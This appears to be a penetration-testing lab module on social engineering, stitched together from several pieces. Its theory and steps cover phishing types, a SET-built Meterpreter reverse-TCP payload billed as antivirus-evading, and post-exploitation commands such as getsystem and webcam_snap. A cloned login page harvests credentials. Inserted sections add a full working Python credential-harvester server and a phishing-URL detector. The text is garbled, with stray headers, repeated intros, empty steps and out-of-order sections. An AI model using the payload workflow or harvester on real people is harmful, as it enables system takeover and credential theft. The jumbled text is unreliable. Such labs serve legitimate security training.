recommend referring to course material or a search engine to research theoretical topics in more
detail.
Lab Duration
It will take approximately 1 hour to complete this lab.
Lab Topology
During your session, you will have access to the following lab configuration.
Depending on the exercises, you may or may not use all of the devices, but they are shown here in the
layout to get an overall understanding of the topology of the lab.
Social engineering is the art of manipulating and utilizing human behavior to conduct a security breach.
In social engineering, the victim does not realize that they are being used. Users are considered the
weakest link in the security chain and are easy to exploit. The attacker can use various methods in
social engineering to gain sensitive and confidential information causing a security breach. The attacker
can use methods such as sending an E-mail or redirecting the user to a malicious Webpage.
In social engineering, the attacker psychologically manipulates the victim and misdirects them to obtain
the desired information.
Figure 1.1: Diagram showing that social engineering consists of psychology, manipulation, and
misdirection.
Social engineering can be considered as the basis for most forms of passive information gathering
techniques. The outcomes of social engineering can be devastating. With one user as a target in an
organization, the attacker can perform a security breach of the entire network. It is just a matter of
getting inside the network using the information provided by the user.
There can be various types of users who can be the target of social engineering. Some of the common
targets are:
Receptionist
IT Helpdesk
HR department
Top management
Learning Outcomes
After completing this exercise, you will be able to:
Social engineering is a method of extracting valuable information from a person to assist in an attack.
The attacker can use one of the three components of social engineering:
Elicitation
Interrogation
Pretexting
Elicitation
When using elicitation, the attacker extracts the information from the victim without asking direct
questions. Rather, the attacker asks open-ended questions and then keeps narrowing them to the point
that the victim reveals the information. In this process, the victim does not realize that they are giving
valuable information to the attacker.
Interrogation
The attacker interrogates the victim to extract valuable information. However, the attacker needs to be
conscious of asking too many questions, to keep the victim from becoming suspicious of them.
The attacker, other than asking questions, can also observe the victim. For example, the attacker may
pay attention to the following:
Project assignment: Project assignment title
Name and surname, index no.
CS450 – Cloud Computing
Body language
Body gestures - the movement of hands and feet
Facial expressions
Pretexting
Pretexting is the practice of giving fake reasons for actions to obtain information. For example, the
attacker hides their real identity and lies about the purpose of the information they require. The purpose
of the conversation is fabricated to gain access to personal information.
Telephone
E-mail
Instant messaging
Corporate spies
Private investigators
Law enforcement agents
An attacker, when using social engineering, has to use a method or technique to obtain the desired
information. There are various techniques that can be used by the attacker. Some of the commonly used
techniques are:
Authority: The attacker shows authority by pretending to be from an organization such as law
enforcement. The attacker displays confidence in pretending to be someone with authority and
pressures the victim to provide information. For example, the attacker may call the reception
and tell the receptionist that he is calling from the police department and needs certain
information.
Urgency: With this technique, a sense of urgency is created, which forces the victim to make a
quick decision without much thought. For example, the attacker may call a victim for the
password to be shared and reset immediately, or his account will be terminated.
Social proof: Social proof is often used when a victim is in a situation they do not know how to
handle. Due to the victim being unsure of what to do, they make decisions by observing others.
There are several ways an attacker can apply this technique to take advantage of the situation by
displaying an act that convinces the victim that this is the correct behavior.
Fear: The attacker uses fear to make the victim do what they want. The attacker creates a
situation in which the victim is forced to act quickly to avoid a dangerous outcome.
Phishing is a social engineering attack that uses technical deception to convince a user to provide
personal information, such as passwords, social security numbers, credit card numbers, and bank
account details. In the phishing attack, the attacker can create a replica Website or Webpage that tricks
the user into providing personal information. The Website or Webpages are such good lookalikes of the
original Website or Webpages that the user gets tricked. The URLs are close to the original, and most
of the time users don't bother to check them. One of the key reasons behind phishing is financial gain.
Mass mailing: A large audience is targeted. Due to the amount of people targeted, it is highly
likely that at least some will fall for the attack. This method is usually performed using SPAM.
Instant messaging: In recent years, instant messaging has become a more common method of
phishing. Malicious URLs are sent with attractive messages to lure users into clicking them.
Malicious Websites: Phishing can also be initiated through malicious Websites. Sometimes
these are very similar to legitimate websites.
By the end of the fourth stage, the phishing attack is successfully completed. In a phishing attack, the
attacker can use various attack methods. Some of these attack methods are:
Man-In-The-Middle
Session Hijacking
Phishing through Search Engines
Link Manipulation
URL Obfuscation Attacks
Client-side Vulnerabilities
Cross-site Scripting
Malware / Keyloggers / Screen loggers / Trojans
E-mails (Deceptive Phishing)
Hosts File Poisoning
DNS-based Phishing
Content-Injection
There are various reasons for a phishing attack to become successful. Some of the common reasons are:
Lack of knowledge: Users are not trained enough or are completely unaware of the dangers of
phishing attacks. Attackers use this method on several hundreds or thousands of users at once,
and several users fall prey to the attack.
Visual deception: Attackers use similar URLs or domain names with an almost exact replica
of the legitimate Website. Users are deceived by the replica of the Website and, without
realizing it, enter their user credentials, which are then captured by the attacker and used on the
real Website.
Visual Indicators: Users mostly do not pay attention to the URL or the domain name and
therefore, end up being a victim of the phishing attack.
Even though there are several types of phishing attacks, the following are three prominent ones:
Spear Phishing
Spear phishing is focused on specific targets. Unlike standard phishing, it does not focus on the mass
public. In this form of phishing, the attacker takes time to research the targets, who typically belong to
organizations. The attacker sends out personalized E-mails that typically carry a sense of urgency.
The E-mails are designed to lure the target to click the provided URL. After the URL is clicked,
malware is downloaded, or personal and sensitive information is exposed.
Spear phishing is usually used with the pretexting technique. The attacker gathers information from
various Websites, specifically focusing on social networking sites.
Whaling
Whaling is a form of phishing attack that follows the same process as phishing but targets senior
executives or high-profile individuals within an organization, specifically those at CxO level.
Pharming
In this type of phishing attack, when a user types the correct URL in the Web browser, the user is
redirected to an exact lookalike Website. The user has not done anything wrong, but the attack has still
occurred. This is done by DNS cache poisoning. The real IP address mapped to the legitimate URL is
changed to an IP address that redirects the user to a malicious Website, which is an exact lookalike.
The user will not be able to suspect anything here because the URL is correct.
Hoax
A hoax email is sent to a high number of recipients with the aim of causing confusion and alarm. They
are usually very convincing and can be quite extreme.
Generally, an alarming or urgent situation is the subject of the email. The recipients are then prompted
to forward the email on to more people.
For example, an email is sent stating that there is a particular computer virus outbreak that causes a lot
of damage and that everyone possible needs to be made aware so certain precautions or actions can be
taken.
The original sender of the hoax does not gain directly from the circulation of the email; the aim is more
to trick, confuse, and panic people.
Shoulder Surfing
Shoulder surfing is a social engineering attack performed by looking over the shoulder of the victim to
retrieve a credit card number, passwords, or any other pertinent information. The attacker directly
observes the information entered by the victim by standing very close to or behind the victim, or uses
vision-enhancing aids such as binoculars to observe from afar. Shoulder surfing attackers also install
closed-circuit cameras hidden behind a wall or ceiling to obtain sensitive information.
Baiting
Baiting is an attack that uses CDs, DVDs, or USB drives. It does not use E-mails as the medium but
relies on storage devices. Mostly, the USB drives are used in this scenario. The USB drives are loaded
with malware and placed in places where they are easy to find. For example, an office worker may find
a USB drive in the parking lot of their office with something like “PAYROLL” or “ACCOUNTS”
written on it to entice the finder into using it. When the finder uses the USB drive on the company’s
laptop, the malware is triggered and infects the laptop. Through the laptop, the malware can eventually
spread to the network.
Tailgating
Tailgating is a social engineering act of gaining access to an electronically locked system or a restricted
area by following a user who has legitimate access, with the intention of accessing vulnerable
information. Tailgating is also known as piggybacking.
Social-Engineer Toolkit (SET) is an open-source Python-based toolkit that you can use to perform
social engineering attacks. SET is part of Kali Linux. Using SET, you can perform various attacks,
such as email phishing or Web-based attacks.
Learning Outcomes
After completing this exercise, you will be able to:
Your Devices
You will be using the following devices in this lab. Please power on this device.
To exploit a user’s system, you first need to create a malicious payload, which can be done with SET.
Note: When first logging into the Kali terminal, you might be greeted with a PID session error. This
will not affect your working environment. Simply click on the X button to remove the message and
continue with the lab practical.
Step 1
Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.
Username: root
Password: Passw0rd
Figure 2.1 Screenshot of PLABKALI01: Displaying the desktop screen of the Kali Linux.
Step 2
Note: SET provides many tools. In this lab, you will focus on specific tools, but in your spare time, you
are free to try all these tools to enhance your learning.
Figure 2.2 Screenshot of PLABKALI01: Clicking the Terminal icon from the left pane on the desktop.
Step 3
setoolkit
Press Enter.
Figure 2.3 Screenshot of PLABKALI01: Executing the setoolkit command in the command prompt
window.
Step 4
If you are using SET for the first time, you need to accept the terms of service. Type the following
letter:
y
Press Enter.
Figure 2.4 Screenshot of PLABKALI01: Entering y to Accept the terms of service to start the Social
Engineering Toolkit (SET).
Step 5
You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting option 5.
To continue with this task, you will need to select the 1) Social-Engineering Attacks option. Type the
following number:
1
Press Enter.
Figure 2.5 Screenshot of PLABKALI01: Entering 1 to Select the option 1) Social- Engineering
Attacks.
Step 6
Next, you will see another menu that relates to the Social-Engineering Attacks option. Out of the
given choices, you can choose 4) Create a Payload and Listener. Type the following number:
4
Press Enter.
Figure 2.6 Screenshot of PLABKALI01: Entering 4 to Select the option 4) Create a Payload and
Listener.
Step 7
Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number:
5
Press Enter.
Figure 2.7 Screenshot of PLABKALI01: Entering 5 to select the option 5) Windows Meterpreter
Reverse_TCP X64 (Windows x64) Meterpreter payload.
Step 8
You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux device. In this lab environment, the IP address for the Kali Linux is
192.168.0.4.
For the IP address for the payload listener option, enter the following IP address:
192.168.0.4
Press Enter.
Note: In a real-world environment, you will have a different IP address. You should not be using this
IP address, as it is applicable only in this lab environment. If you do not know the IP address of your
Kali Linux, simply open another command prompt window and run ifconfig. If you know the network
adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will
have to check your system.
Figure 2.8 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.
Step 9
Next, you will be prompted to enter the port number. Type the following port number in the Enter the
PORT for the reverse listener option:
443
Press Enter.
Figure 2.9 Screenshot of PLABKALI01: Entering the port number for the reverse listener.
Step 10
Notice that the "backdooring a legit executable" process starts. An executable is now being packaged in
a manner such that the antivirus cannot detect it. After the executable is created, it is stored in /root/.set.
The default name for the file is payload.exe, which you will change after transporting it to the victim’s
system.
You are now prompted to start the payload and listener. Type the following:
yes
Press Enter.
Figure 2.10 Screenshot of PLABKALI01: Entering YES to start the payload and listener.
Step 11
The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.
Figure 2.11 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Leave the devices you have powered on in their current state and proceed to the next task.
After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:
Since this is a lab environment, you can simulate the download of the file from the FTP server. In real-
world scenarios, users are likely to download files that they assume are legitimate applications. The
attackers usually insert the payload in these files that the users download.
In this task, you will set up an FTP server and share the file with the victim.
Step 1
Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.
Figure 2.12 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Step 2
Next, you need to set up an FTP server. There are multiple options: you can either set up an independent
FTP server or use Metasploit's auxiliary FTP server. Type the following command:
use auxiliary/server/ftp
Press Enter.
Figure 2.13 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.
Step 3
Notice that the command prompt has now changed to msf5 auxiliary(server/ftp). You need to set the
FTP root directory now. To do this, type the following command:
Press Enter.
Figure 2.14 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.
Step 4
Next, you need to type the following command to trigger the payload on the target system:
exploit
Press Enter.
Alert: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.
Step 5
Notice that the command is successful, and the server has started.
Figure 2.16 Screenshot of PLABKALI01: Showing the service listener has started.
Note: Do not close the Metasploit window or VNC window. Leave the devices you have powered on in
their current state and proceed to the next task.
After you have set up the FTP server, you need to download the file on the victim’s system. You do not
need an FTP client to download the file. In this task, you will use the Windows command prompt to
connect to the FTP server.
Note: In the real environment, you will probably not be the one who will be downloading the file on the
victim’s system. You will convince the victim to download the file. For the sake of completing this
exercise, you will download the file from the FTP server to the victim’s system.
Step 1
Figure 2.17 Screenshot of PLABWIN10: Showing the desktop screen of the Windows system.
Step 2
Figure 2.18 Screenshot of PLABWIN10: Selecting the Run option from the context menu.
Step 3
The Run dialog box is displayed. In the Open textbox, type the following:
cmd
Figure 2.19 Screenshot of PLABWIN10: Showing the Run dialog box with the cmd command in the
Open textbox.
Step 4
The command prompt window is displayed. You will now connect with the FTP server and download
the file.
ftp 192.168.0.4
Press Enter.
Figure 2.20 Screenshot of PLABWIN10: Using the command prompt to connect with the FTP server
192.168.0.4.
Step 5
You are now connected with the FTP server. You will now authenticate as the anonymous user. Type
the following name as the User:
anonymous
Press Enter.
Figure 2.21 Screenshot of PLABWIN10: Entering the username as Anonymous to connect with the
FTP server.
Step 6
Next, you are prompted for the password. Leave it blank and press Enter.
Figure 2.22 Screenshot of PLABWIN10: Showing the successful connection with the FTP server
192.168.0.4.
Step 7
You need to now list the files on the FTP server. To be able to do this, type the following command:
dir
Press Enter.
Figure 2.23 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.
Step 8
Notice that the command generated an error. This is because of the Windows Security Alert dialog
box, which opened.
Keep the default settings, and click Allow Access to allow the application through the firewall.
Figure 2.24 Screenshot of PLABWIN10: Clicking Allow access on the Windows Security Alert dialog
box.
Step 9
dir
Press Enter. Notice that the payload.exe is present on the FTP server.
Figure 2.25 Screenshot of PLABWIN10: Listing the files on the FTP server 192.168.0.4.
Step 10
binary
Press Enter.
Step 11
Next, transfer the file on to the victim’s system. Type the following command:
get payload.exe
Press Enter.
Figure 2.27 Screenshot of PLABWIN10: Showing the successful transfer of the payload.exe.
Step 12
You can now safely close the FTP server. Type the following command:
quit
Press Enter.
Figure 2.28 Screenshot of PLABWIN10: Entering the quit command to exit from the FTP server.
Step 13
Notice that the FTP prompt is no longer available. You are back on the command prompt. Minimize
the command prompt window.
Figure 2.29 Screenshot of PLABWIN10: Showing the closed session with the FTP server.
Leave the devices you have powered on in their current state and proceed to the next task.
After creating and copying the payload to the user’s system, you need to trigger the payload. In a real-
life scenario, it will be the user who will be triggering the payload. You will now simulate the same
behavior in this task and execute the payload.
Step 1
Windows Defender
Press Enter.
Step 2
In the Windows Defender window, select Open Windows Defender Security Center.
Figure 2.31 Screenshot of PLABWIN10: Displaying opening Windows Defender Security Center.
Step 3
Step 4
In Virus & threat protection select Virus & threat protection settings
Figure 2.33 Screenshot of PLABWIN10: Displaying opening Virus & threat protection settings
Step 5
Step 6
Step 7
Open File Explorer from the taskbar and navigate to the following path:
C:\Users\Administrator.PRACTICELABS
Figure 2.36 Screenshot of PLABWIN10: Showing the successful download of the payload.exe on the
Administrator.PRACTICELABS Windows system in This PC.
Step 8
Figure 2.37 Screenshot of PLABWIN10: Moving the file, payload.exe, to the Downloads folder.
Step 9
Navigate to the Downloads folder. Notice that the payload is now present in this folder.
Figure 2.38 Screenshot of PLABWIN10: Showing the file, payload.exe, in the Downloads folder.
Step 10
Note: You can rename the file by selecting it and pressing F2. In some laptop makes, you may need to
press Fn + F2. Alternatively, you can right-click the file and select Rename.
Step 11
Figure 2.40 Screenshot of PLABWIN10: Clicking the file, setup.exe, to execute it. Closing the File
Explorer Window.
Step 12
Switch back to the Kali Linux window. Notice that the connection with the victim’s system is already
opened.
Note: To be able to complete the next set of tasks in this exercise, you need to keep this console window
open. Do NOT shut it down or exit from it.
Alert: If you double-click more than once on the setup file, more than one meterpreter session will be
opened.
Figure 2.41 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.
Leave the devices you have powered on in their current state and proceed to the next task.
The payload is now running on the victim’s system. You need to exploit the victim’s system now.
Step 1
Ensure that you are connected to PLABKALI01. You need to open the session with the victim’s
system now.
sessions -i 1
Press Enter.
Figure 2.42 Screenshot of PLABKALI01: Showing a successful connection with the victim’s system
after the setup.exe file is executed.
Step 2
Notice the interaction with the victim’s system has now started. You are now virtually controlling the
victim’s system. Let’s see the processes that are running on the victim’s system.
ps
Press Enter.
Figure 2.43 Screenshot of PLABWIN10: Entering the ps command to view the running processes.
Step 3
Notice that the processes running on the victim’s system are now displayed. It is important to note the
running process, setup.exe, which is the payload that you have executed on the victim’s system.
Figure 2.44 Screenshot of PLABKALI01: Listing the running processes on the victim’s system.
Step 4
getsystem
Press Enter.
Figure 2.45 Screenshot of PLABKALI01: Showing the success in a privilege escalation on the system.
Step 5
Let’s now check if the victim’s system has a webcam and take a picture. To check this, enter the
following command:
webcam_snap
Press Enter.
Notice the output, which states that the victim’s system does not have a webcam.
Figure 2.46 Screenshot of PLABKALI01: Output showing the victim’s system does not have a
webcam.
Step 6
You can now exit from the meterpreter prompt. Type the following command:
exit
Press Enter.
Figure 2.47 Screenshot of PLABKALI01: Entering the exit command to exit from the meterpreter
prompt.
Step 7
clear
You can also exit from the Metasploit framework prompt. Type the following command:
exit -y
Press Enter.
Note: You have an open session with the target system. Therefore, the exit command will not work. You
need to use the above-mentioned command.
Figure 2.48 Screenshot of PLABKALI01: Entering the exit -y command to exit from the msf5 prompt.
Step 8
A cloned Website is a phishing Website that resembles the original and steals the user's credentials; this
is also known as a spoofed Website. In this type of attack, the attacker clones legitimate Websites and
sets up the cloned Website with a URL resembling the legitimate Website’s URL. For example, the
spoofed Website would be www.htomail.com instead of www.hotmail.com, which is the legitimate
Website. The URL of the spoofed Website is shared with the targeted users via E-mail. When the user
clicks on the URL, the user cannot tell the difference between the spoofed and the legitimate Website,
unless the user pays attention to the URL.
In this task, you will set up a spoofed or cloned Website and capture user credentials.
Step 1
Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.
Ensure that the terminal window is displayed with the set prompt.
Step 2
There are various methods that you can use to conduct a social engineering attack. In this step, you will
choose Website Attack Vectors, which will allow you to launch an attack using a Website that will be
generated by SET. Type the following:
2
Press Enter.
Figure 2.51 Screenshot of PLABKALI01: Typing 2 to choose Website Attack Vectors, which will
allow you to launch an attack using a Website that will be generated by SET and pressing Enter.
Step 3
Next, you need to choose a method to clone a Website that requires user credentials from a user. Your
aim is to capture the user credentials that the user will feed into the cloned Website. To be able to do
this, type the following:
3
Press Enter.
Figure 2.52 Screenshot of PLABKALI01: Typing 3 to choose a method to clone a Website that
requires user credentials from a user and pressing Enter.
Step 4
SET has pre-defined templates of some of the most widely used Websites. Therefore, you would use a
template and clone the Website. To do this, type the following:
1
Press Enter.
Figure 2.53 Screenshot of PLABKALI01: Typing 1 to select the Web Templates method to clone a
Website based on a template and pressing Enter.
Step 5
When SET prompts for the IP address for the POST back in the harvester (the address of PLABKALI01,
to which the cloned page will submit the captured credentials), type the following:
192.168.0.4
Press Enter.
Step 6
You need to select the pre-defined template. Type the following number:
3
Press Enter.
Figure 2.55 Screenshot of PLABKALI01: Typing 3 to select a pre-defined template and pressing Enter.
Step 7
Step 8
Typically, you would send the URL or the cloned Website link to the user via an E-mail. In this lab
environment, you will test out how the process works.
Connect to PLABWIN10
Step 9
Open the Edge browser from the Taskbar and browse to the following site:
http://192.168.0.4
Figure 2.58 Screenshot of PLABWIN10: Displaying browsing to the spoofed web address.
Note: In a real-world scenario, the user would be tricked into browsing to the website impersonating the
original through an E-mail or a phone call. The attacker would modify the impersonating website to
resemble the original as closely as possible.
Step 10
Notice that the Website is not an exact replica of Twitter, but it has all the fields you need to capture
the information.
Scroll down to the Username text box and type the following name:
mjfox
In the Password text box, type the following:
password
Note: You can use any username and password. Avoid using a real username and password. If
prompted to save the password, click No.
Figure 2.59 Screenshot of PLABWIN10: Entering the user credentials on the displayed Webpage.
Note: After signing in, the page may come up with a Can’t connect securely to this page notice. This
will not affect the PLABKALI01 output.
Step 11
In the terminal window, notice that the username and password have been captured.
Figure 2.60: Screenshot of PLABKALI01: Showing the captured user credentials in the terminal
window.
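The mechanism behind the cloned page you just used, as an added example that is not part of the lab or of SET: a minimal harvester that serves a stand-in login form, records whatever is POSTed to it together with the client address, and bounces the browser onward with a 303 (SET redirects to the genuine site; REDIRECT_TO = "/" is an assumption that keeps this self-contained and offline). The form, its field names and the submit_login helper that stands in for the victim's browser are constructed for the example. Run it on a lab network only.

```python
"""Minimal credential harvester (added example; not SET's code).

Serves a login form, records every POST and redirects the victim onward.
REDIRECT_TO and the form below are assumptions made for this example.
"""
import threading
import urllib.request
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode

REDIRECT_TO = "/"   # assumption: "/" keeps the example self-contained; SET uses the real site

# Constructed stand-in for the cloned page SET would generate from a template
LOGIN_FORM = b"""<html><body><h1>Sign in</h1>
<form method="post" action="/login">
<input name="username"> <input name="password" type="password">
<button type="submit">Log in</button></form></body></html>"""


def extract_credentials(body: bytes) -> dict:
    """Parse a form-encoded body; keep the two fields a login form carries."""
    fields = parse_qs(body.decode("utf-8", errors="replace"))
    return {name: fields.get(name, [""])[0] for name in ("username", "password")}


class HarvesterHandler(BaseHTTPRequestHandler):
    captured = []   # every submission seen by this server

    def log_message(self, *args):   # keep the console quiet
        pass

    def do_GET(self):
        # Any path returns the cloned login page
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(LOGIN_FORM)))
        self.end_headers()
        self.wfile.write(LOGIN_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        creds = extract_credentials(self.rfile.read(length))
        creds["client"] = self.client_address[0]
        HarvesterHandler.captured.append(creds)
        # 303 turns the browser's POST into a GET of the next page, so the
        # victim just sees a login page again and assumes a typo
        self.send_response(HTTPStatus.SEE_OTHER)
        self.send_header("Location", REDIRECT_TO)
        self.send_header("Content-Length", "0")
        self.end_headers()


def start_harvester(host="127.0.0.1", port=0):
    """Run the server on a daemon thread; port 0 lets the OS choose a free port."""
    server = ThreadingHTTPServer((host, port), HarvesterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def submit_login(base_url: str, username: str, password: str) -> int:
    """Stand-in for the victim's browser: POST the form, follow the redirect,
    return the final HTTP status."""
    data = urlencode({"username": username, "password": password}).encode()
    with urllib.request.urlopen(base_url + "/login", data=data) as resp:
        return resp.status


if __name__ == "__main__":
    srv = start_harvester()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    submit_login(base, "mjfox", "password")
    print("captured:", HarvesterHandler.captured)
    srv.shutdown()
```

Nothing here is specific to Twitter: the harvester accepts whatever the form posts, which is why SET's templates only need the field names of the real login page to be useful. The same server started with a real clone on port 80 is all the lab's Step 9 visit talks to.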
Social engineering is a method of convincing a user to share confidential information, whether official
or personal. For example, you could receive an E-mail claiming that your bank account is locked or
frozen and that you need to click the given URL and provide your credentials to unlock it. This is a
tricky situation for many users: they panic and, without a second thought, click the URL and hand over
their credentials. This method is called phishing, one of the social engineering methods covered earlier
in this module.
There are several ways to detect phishing, for example a browser toolbar that checks each site you visit,
or a Website that specialises in tracking reported phishing sites. Both rely on reputation data; a freshly
registered lookalike domain may not be listed yet, so the address bar itself still deserves a look.
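As an added example that is not from the lab, the kind of URL check a toolbar or mail gateway applies before the user ever sees the page. It covers the spoofed-address point from the cloned-Website task (www.htomail.com against www.hotmail.com) as well as the detection methods just described. The brand list, the sample URLs and the rule names are constructed for illustration; real products layer reputation feeds and the Public Suffix List on top of heuristics like these.

```python
"""Heuristic lookalike / spoofed-URL check (added example; not from the lab).

The brand list and the sample URLs are constructed for illustration.
"""
import ipaddress
from urllib.parse import urlsplit

# Brands whose login pages are commonly cloned (constructed list)
PROTECTED_DOMAINS = ("hotmail.com", "twitter.com", "google.com", "facebook.com")


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute); a transposition costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete
                           cur[j - 1] + 1,              # insert
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Enough for the .com names used here;
    a production check would consult the Public Suffix List."""
    return ".".join(host.split(".")[-2:])


def phishing_indicators(url: str) -> list[str]:
    """Return the reasons a URL looks like a spoof. An empty list means no
    heuristic fired, which is not proof that the site is genuine."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    labels = host.split(".")
    reasons = []

    # http://hotmail.com@evil.example/ shows the brand but connects to evil.example
    if parts.username is not None:
        reasons.append("credentials-in-url")

    # A raw IP (like the lab's http://192.168.0.4) is never a brand's login page
    try:
        ipaddress.ip_address(host)
        reasons.append("ip-address-host")
    except ValueError:
        pass

    # Internationalised labels can render as homoglyphs of Latin letters
    if any(label.startswith("xn--") for label in labels):
        reasons.append("punycode-label")

    site = registrable_domain(host)
    for brand in PROTECTED_DOMAINS:
        if site == brand:
            continue
        # htomail.com vs hotmail.com: two edits away from the real domain
        if levenshtein(site, brand) <= 2:
            reasons.append(f"lookalike-domain:{brand}")
        # hotmail.com.secure-login.net: brand name buried in a subdomain
        if brand.split(".")[0] in labels[:-2]:
            reasons.append(f"brand-in-subdomain:{brand}")
    return reasons


if __name__ == "__main__":
    for sample in ("https://www.hotmail.com/login",
                   "http://www.htomail.com/login",
                   "http://192.168.0.4/",
                   "https://hotmail.com.secure-login.net/",
                   "http://hotmail.com@evil.example/"):
        print(f"{sample:45} {phishing_indicators(sample)}")
```

The edit-distance rule is deliberately loose (two edits) so that transpositions such as htomail and digit swaps such as hotmai1 are both caught; with a longer brand list the threshold should scale with domain length, or short brands will collide with each other.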
Learning Outcomes
After completing this exercise, you will be able to:
Your Devices
You will be using the following devices in this lab. Please power on this device.
In this task, you will learn to install Firefox. To do this, perform the following steps:
Step 1
Figure 3.1 Screenshot of PLABWIN10: Displaying the PLABWIN10 desktop. Microsoft Edge is
selected.
Step 2
Step 3
Step 4
Figure 3.4 Screenshot of PLABWIN10: Clicking the Firefox Setup 67.0.exe link.
Step 5
Step 6
Figure 3.6 Screenshot of PLABWIN10: Showing a dialog box with the file extraction progress.
Step 7
The Mozilla Firefox Setup dialog box is displayed. On the Welcome to the Mozilla Firefox Setup
Wizard page, click Next.
Figure 3.7 Screenshot of PLABWIN10: Clicking Next on the Welcome to the Mozilla Firefox Setup
Wizard page.
Step 8
On the Setup Type page, keep the default selection and click Next.
Figure 3.8 Screenshot of PLABWIN10: Clicking Next on the Setup Type page.
Step 9
Step 10
Figure 3.10 Screenshot of PLABWIN10: Showing the installation progress on the Installing page.
Step 11
On the Completing the Mozilla Firefox Setup Wizard page, click Finish.
Figure 3.11 Screenshot of PLABWIN10: Clicking Finish on the Completing the Mozilla Firefox Setup
Wizard page.
Step 12
The Netcraft toolbar is designed to protect users from phishing attacks. It is a Web browser extension
that warns you when the site you visit is a known phishing site and shows reputation details for any
site you visit.
In this task, you will learn to install and use the Netcraft toolbar. To do this, perform the following
steps:
Step 1
The Microsoft Edge window opens. In the address bar, type the following URL:
toolbar.netcraft.com
Press Enter.
Figure 3.13 Screenshot of PLABWIN10: Entering the URL for the Netcraft toolbar.
Step 2
Figure 3.14 Screenshot of PLABWIN10: Clicking the Download the Netcraft Extension option.
Step 3
On the Download Now page, scroll down and click the Firefox icon.
Step 4
Step 5
Step 6
Notice that the Netcraft icon is now added on the right side of the toolbar in Microsoft Edge. Click
this icon.
Figure 3.18 Screenshot of PLABWIN10: Showing the Netcraft icon on the right side of the toolbar in
Microsoft Edge.
Step 7
Since you are on addons.mozilla.org, the toolbar shows the details for that Website.
Figure 3.19 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
Microsoft.com.
Step 8
https://www.exploit-db.com
Press Enter.
Step 9
Click the Netcraft icon. Notice that the details about the Website are now displayed.
Figure 3.21 Screenshot of PLABWIN10: Clicking the Netcraft icon and finding the result about
exploit-db.com.
PhishTank is a Website that maintains a community-reported repository of phishing sites. You can simply
enter a URL, and it will tell you whether that URL has been reported and verified as a phish.
In this task, you will use the PhishTank Website. To do this, perform the following steps:
Step 1
https://www.phishtank.com
Press Enter.
Figure 3.22 Screenshot of PLABWIN10: Entering the phishtank.com URL in the address bar.
Step 2
The PhishTank Website is displayed. In the Found a phishing site? text box, type the following URL:
http://testphp.vulnweb.com
Click Is it a phish?
Note: You can either search for a Website or choose one from the given list.
Figure 3.23 Screenshot of PLABWIN10: Entering a URL to test on the PhishTank website and clicking
the Is it a phish button.
Step 3
Review
Well done, you have completed the Social Engineering Practice Lab.
Summary
You completed the following exercises:
Feedback
Shut down all virtual machines used in this lab. Alternatively, you can log out of the lab platform.
Introduction
The Conduct a Social Engineering Attack module provides you with the instructions and devices to
develop your hands-on skills in the following topics.
Objectives
Social Engineering
Lab Diagram
During your session, you will have access to the following lab configuration. Depending on the
exercises you may or may not use all the devices, but they are shown here in the layout to get an overall
understanding of the topology of the lab.
In this module, you will be working on the following equipment to carry out the steps defined in each
exercise.
To start, simply choose a device and click Power on. In some cases, the devices may power on
automatically.
For further information and technical support, please see our Help and Support page.
Copyright Notice
This document and its content is copyright of Practice-IT - © Practice-IT 2017. All rights reserved.
Any redistribution or reproduction of part or all the contents in any form is prohibited other than the
following:
1. You may print or download to a local hard disk extracts for your personal and non-commercial use
only.
2. You may copy the content to individual third parties for their personal use, but only if you
acknowledge the website as the source of the material. You may not, except with our express written
permission, distribute or commercially exploit the content. Nor may you transmit it or store it in any
other website or other form of electronic retrieval system.
With a little skill, you can always break someone's password using methods such as brute-force or
dictionary attacks. However, it is much easier to trick someone into simply sharing the password with
you without them even realising that they have shared it. You can also take control of their system
without their knowledge, but you must trick them into installing something or opening a file that
contains a specific payload. When you trick people in this way, so that they share confidential
information or run a malicious file or payload, you are performing a social engineering attack: the art of
manipulating people into performing a task that lets you obtain their confidential information or even
control their system.
Please refer to your course material or use your favorite search engine to research for more information
about this topic.
You can perform social engineering using various methods, from simply talking to people and tricking
them to more sophisticated methods with the help of the Social Engineering Toolkit (SET), a
Python-driven suite of custom tools that focus on attacking the human element.
Important: SET provides many tools. In this task, you will focus on specific tools but in your spare
time, you are free to try all these tools to enhance your learning.
Step 1
Ensure you have powered on the required devices and connect to PLABKALI01. On the login screen, type
root in the username field.
Figure 1.1 Screenshot of PLABKALI01: Typing root into the username field on the login screen.
